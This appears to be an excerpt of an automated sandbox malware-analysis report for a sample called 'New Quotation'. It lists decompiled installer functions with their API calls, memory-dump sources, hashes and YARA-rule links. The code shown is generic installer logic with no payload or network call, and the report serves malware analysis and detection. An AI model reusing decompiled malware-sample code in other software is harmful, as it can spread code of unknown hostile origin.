                                                                                                                                                                                          • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 710916BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E710916BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                                                                                                                          0x710916d7
                                                                                                                                                                                          0x710916e3
                                                                                                                                                                                          0x710916f0
                                                                                                                                                                                          0x710916f7
                                                                                                                                                                                          0x71091700
                                                                                                                                                                                          0x7109170c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,710922D8,?,00000808), ref: 710916D5
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,710922D8,?,00000808), ref: 710916DC
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,710922D8,?,00000808), ref: 710916F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(710922D8,00000000), ref: 710916F7
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71091700
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                          • Opcode ID: 3ff6650890617d8d0bbae0faee8fbe5a15cf6cec02af1cb8779121b9eadad9a0
                                                                                                                                                                                          • Instruction ID: 7920799553019444be4807084a66ece0bbe854c766e3a69d13db6e1262e5c5cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ff6650890617d8d0bbae0faee8fbe5a15cf6cec02af1cb8779121b9eadad9a0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19F0AC7320A1387FD62116A78D5CDABBE9CEFCB2F5B210215F628E219086725D01D7F1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                                                                          0x00401c43
                                                                                                                                                                                          0x00401c45
                                                                                                                                                                                          0x00401c4c
                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                          0x00401c52
                                                                                                                                                                                          0x00401c5c
                                                                                                                                                                                          0x00401c60
                                                                                                                                                                                          0x00401c63
                                                                                                                                                                                          0x00401c6c
                                                                                                                                                                                          0x00401c6c
                                                                                                                                                                                          0x00401c6f
                                                                                                                                                                                          0x00401c73
                                                                                                                                                                                          0x00401c7c
                                                                                                                                                                                          0x00401c7c
                                                                                                                                                                                          0x00401c7f
                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                          0x00401c85
                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                          0x00401cdc
                                                                                                                                                                                          0x00401ce7
                                                                                                                                                                                          0x00401cf1
                                                                                                                                                                                          0x00401cf4
                                                                                                                                                                                          0x00401cf4
                                                                                                                                                                                          0x00401cfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c87
                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                          0x00401c90
                                                                                                                                                                                          0x00401c93
                                                                                                                                                                                          0x00401c99
                                                                                                                                                                                          0x00401ca0
                                                                                                                                                                                          0x00401ca3
                                                                                                                                                                                          0x00401ccb
                                                                                                                                                                                          0x00401d03
                                                                                                                                                                                          0x00401d03
                                                                                                                                                                                          0x00401ca5
                                                                                                                                                                                          0x00401cb3
                                                                                                                                                                                          0x00401cbb
                                                                                                                                                                                          0x00401cbe
                                                                                                                                                                                          0x00401cbe
                                                                                                                                                                                          0x00401ca3
                                                                                                                                                                                          0x00401d06
                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                          0x00401d0f
                                                                                                                                                                                          0x00402ba4
                                                                                                                                                                                          0x00402ba4
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                          • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                          • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                                                                                                                                          0x00404d4f
                                                                                                                                                                                          0x00404d54
                                                                                                                                                                                          0x00404d5c
                                                                                                                                                                                          0x00404d5d
                                                                                                                                                                                          0x00404d6a
                                                                                                                                                                                          0x00404d72
                                                                                                                                                                                          0x00404d73
                                                                                                                                                                                          0x00404d75
                                                                                                                                                                                          0x00404d77
                                                                                                                                                                                          0x00404d79
                                                                                                                                                                                          0x00404d7c
                                                                                                                                                                                          0x00404d7c
                                                                                                                                                                                          0x00404d83
                                                                                                                                                                                          0x00404d89
                                                                                                                                                                                          0x00404d89
                                                                                                                                                                                          0x00404d90
                                                                                                                                                                                          0x00404d97
                                                                                                                                                                                          0x00404d9a
                                                                                                                                                                                          0x00404d9d
                                                                                                                                                                                          0x00404d9d
                                                                                                                                                                                          0x00404da1
                                                                                                                                                                                          0x00404db1
                                                                                                                                                                                          0x00404db3
                                                                                                                                                                                          0x00404db6
                                                                                                                                                                                          0x00404d5f
                                                                                                                                                                                          0x00404d5f
                                                                                                                                                                                          0x00404d66
                                                                                                                                                                                          0x00404d66
                                                                                                                                                                                          0x00404dbe
                                                                                                                                                                                          0x00404dc9
                                                                                                                                                                                          0x00404ddf
                                                                                                                                                                                          0x00404df0
                                                                                                                                                                                          0x00404e0c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                          • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                          • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                                                                          0x00405f20
                                                                                                                                                                                          0x00405f2b
                                                                                                                                                                                          0x00405f2f
                                                                                                                                                                                          0x00405f36
                                                                                                                                                                                          0x00405f42
                                                                                                                                                                                          0x00405f52
                                                                                                                                                                                          0x00405f54
                                                                                                                                                                                          0x00405f6c
                                                                                                                                                                                          0x00405f6d
                                                                                                                                                                                          0x00405f74
                                                                                                                                                                                          0x00405f75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405f58
                                                                                                                                                                                          0x00405f5f
                                                                                                                                                                                          0x00405f67
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405f5f
                                                                                                                                                                                          0x00405f77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405f8b
                                                                                                                                                                                          0x00405f44
                                                                                                                                                                                          0x00405f4a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405f4a
                                                                                                                                                                                          0x00405f31
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 46u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 46u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 46u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75363420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                          • String ID: 46u$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 3248276644-73977898
                                                                                                                                                                                          • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                          • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                          • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                                                                                          0x00405e0d
                                                                                                                                                                                          0x00405e1a
                                                                                                                                                                                          0x00405e1b
                                                                                                                                                                                          0x00405e26
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e36

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                          • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 710910E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E710910E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7109506c = _a8;
				 *0x71095070 = _a16;
				 *0x71095074 = _a12;
				_a12( *0x71095048, E71091651, _t73);
				_t66 =  *0x7109506c +  *0x7109506c * 4 << 3;
				_t27 = E710912E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x71095040;
							if( *0x71095040 == 0) {
								goto L26;
							}
							E71091603( *0x71095074, _t31 + 4, _t66);
							_t34 =  *0x71095040;
							_t86 = _t86 + 0xc;
							 *0x71095040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71091312(E7109135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71091381(_t80, E710912E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E71091603(_t10,  *0x71095074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x71095040;
							 *0x71095040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x71095070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E71091603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7109506c +  *0x7109506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E71091603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x71095070);
						 *( *0x71095070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                                                                                                                          0x710910eb
                                                                                                                                                                                          0x71091100
                                                                                                                                                                                          0x71091109
                                                                                                                                                                                          0x7109110e
                                                                                                                                                                                          0x71091119
                                                                                                                                                                                          0x7109111c
                                                                                                                                                                                          0x71091125
                                                                                                                                                                                          0x71091129
                                                                                                                                                                                          0x7109112b
                                                                                                                                                                                          0x710912b0
                                                                                                                                                                                          0x710912ba
                                                                                                                                                                                          0x710912ba
                                                                                                                                                                                          0x71091132
                                                                                                                                                                                          0x71091132
                                                                                                                                                                                          0x71091137
                                                                                                                                                                                          0x71091138
                                                                                                                                                                                          0x7109113a
                                                                                                                                                                                          0x7109113d
                                                                                                                                                                                          0x71091256
                                                                                                                                                                                          0x71091259
